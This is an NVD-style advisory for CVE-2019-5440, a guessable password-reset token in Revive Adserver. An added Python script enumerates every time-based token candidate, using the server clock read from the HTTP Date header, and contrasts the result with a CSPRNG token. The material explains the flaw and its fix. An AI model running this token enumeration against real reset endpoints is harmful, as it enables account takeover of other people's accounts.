Unrated severity · NVD Advisory · Published May 28, 2019 · Updated Aug 4, 2024
CVE-2019-5440
Description
Use of a cryptographically weak PRNG in the password-recovery token generation of Revive Adserver before 4.2.1 allows a potential authentication bypass through the password recovery functionality. In lib/OA/Dal/PasswordRecovery.php, generateRecoveryId() builds the reset token from PHP's uniqid(), so the token depends only on the current server time. That time is often disclosed to the second in the HTTP Date response header, leaving an attacker only the sub-second part of the token to enumerate.
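The following is an added illustration, not code from Revive Adserver or the HackerOne report. It models uniqid() as PHP documents it (8 hex digits of seconds followed by 5 hex digits of microseconds, no more_entropy), assumes the recovery id is that raw value (a deterministic hash of it would not enlarge the search space), and reads the server clock from a constructed Date header. It then enumerates every token the server could have issued in that second, plus clock skew, and contrasts the result with a CSPRNG-based token.

```python
"""
Why a uniqid()-derived password-reset token is brute-forceable once the
attacker knows the server clock (e.g. from the HTTP Date header).
Added example, not Revive Adserver code; assumptions are marked.
"""
import math
import secrets
from email.utils import formatdate, parsedate_to_datetime


def php_uniqid(sec: int, usec: int) -> str:
    """Model of PHP's uniqid() without more_entropy: sprintf("%08x%05x", sec, usec).
    Every bit of the value is a function of the server clock; none is random."""
    return f"{sec:08x}{usec:05x}"


def weak_recovery_id(sec: int, usec: int) -> str:
    """Stand-in for a generateRecoveryId() that returns uniqid() (assumption:
    the raw value; hashing it would leave the candidate set unchanged)."""
    return php_uniqid(sec, usec)


def strong_recovery_id() -> str:
    """Hardened form: 128 bits from the OS CSPRNG, independent of time."""
    return secrets.token_hex(16)


def search_space_bits(skew_seconds: int) -> float:
    """Effective entropy of the weak token when the attacker knows the clock
    to within +/- skew_seconds: one million microsecond values per second."""
    return math.log2((2 * skew_seconds + 1) * 1_000_000)


def candidate_tokens(date_header: str, skew_seconds: int = 1):
    """Enumerate every token the server could have produced in the window
    implied by the Date header (second resolution) plus clock skew."""
    base = int(parsedate_to_datetime(date_header).timestamp())
    for sec in range(base - skew_seconds, base + skew_seconds + 1):
        for usec in range(1_000_000):
            yield weak_recovery_id(sec, usec)


def recover_token(date_header: str, is_valid, skew_seconds: int = 1):
    """Attacker loop: try candidates against the reset endpoint (modelled here
    by the is_valid oracle) until one is accepted. Returns the token or None."""
    for tok in candidate_tokens(date_header, skew_seconds):
        if is_valid(tok):
            return tok
    return None


# Constructed scenario: the victim's reset request is handled at this server
# time, and the attacker reads the Date header of the server's response.
SERVER_SEC = 1559044800          # 2019-05-28 12:00:00 UTC (constructed)
SERVER_USEC = 123456             # constructed sub-second component
ISSUED_TOKEN = weak_recovery_id(SERVER_SEC, SERVER_USEC)
DATE_HEADER = formatdate(SERVER_SEC, usegmt=True)


def demo() -> bool:
    """True if the attacker recovers the issued token from the Date header alone."""
    found = recover_token(DATE_HEADER, lambda t: t == ISSUED_TOKEN)
    return found == ISSUED_TOKEN


if __name__ == "__main__":
    print("weak token:", ISSUED_TOKEN, "bits of search space:", round(search_space_bits(1), 1))
    print("recovered from Date header:", demo())
    print("strong token:", strong_recovery_id(), "(128 bits, clock-independent)")
```

With a one-second skew allowance the attacker faces about three million candidates, roughly 21.5 bits, versus 128 bits for secrets.token_hex(16); in practice the reset endpoint would also need rate limiting and token expiry, but no amount of either rescues a token the attacker can enumerate offline.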
Affected products (2)
- Revive Adserver: affected range < 4.2.1
- Revive/Revive Adserver v5: fixed in 4.2.1
References (1)
- https://hackerone.com/reports/576504 (MITRE, x_refsource_MISC)